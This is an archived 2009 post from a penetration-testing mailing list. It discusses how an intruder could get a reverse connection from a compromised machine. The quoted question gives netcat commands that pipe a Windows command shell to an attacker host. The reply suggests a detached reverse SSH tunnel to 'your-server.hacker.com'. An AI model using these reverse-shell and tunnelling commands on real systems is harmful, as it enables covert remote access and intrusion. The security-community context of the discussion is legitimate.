|
Penetration Testing
mailing list archives
Re: Netcat reverse shell and ftp
From: "Adriel T. Desautels" <ad_lists () netragard com>
Date: Sun, 25 Jan 2009 20:03:26 -0500
a better way would be
screen -d -m ssh -R 2222:localhost:22 your-server.hacker.com
then on your-server just ssh localhost -p 22
On Jan 24, 2009, at 11:46 AM, Avaya.Toons wrote:
Hello all,
Can any one show me how an intruder could ftp back to his machine
using a reverse nc session.
The ftp server back in the attacker machine needs authentication.
attacker>nc -L -P 23
victim>cmd | nc attacker 23
Adriel T. Desautels
ad_lists () netragard com
--------------------------------------
Subscribe to our blog
http://snosoft.blogspot.com
By Date
By Thread
Current thread:
|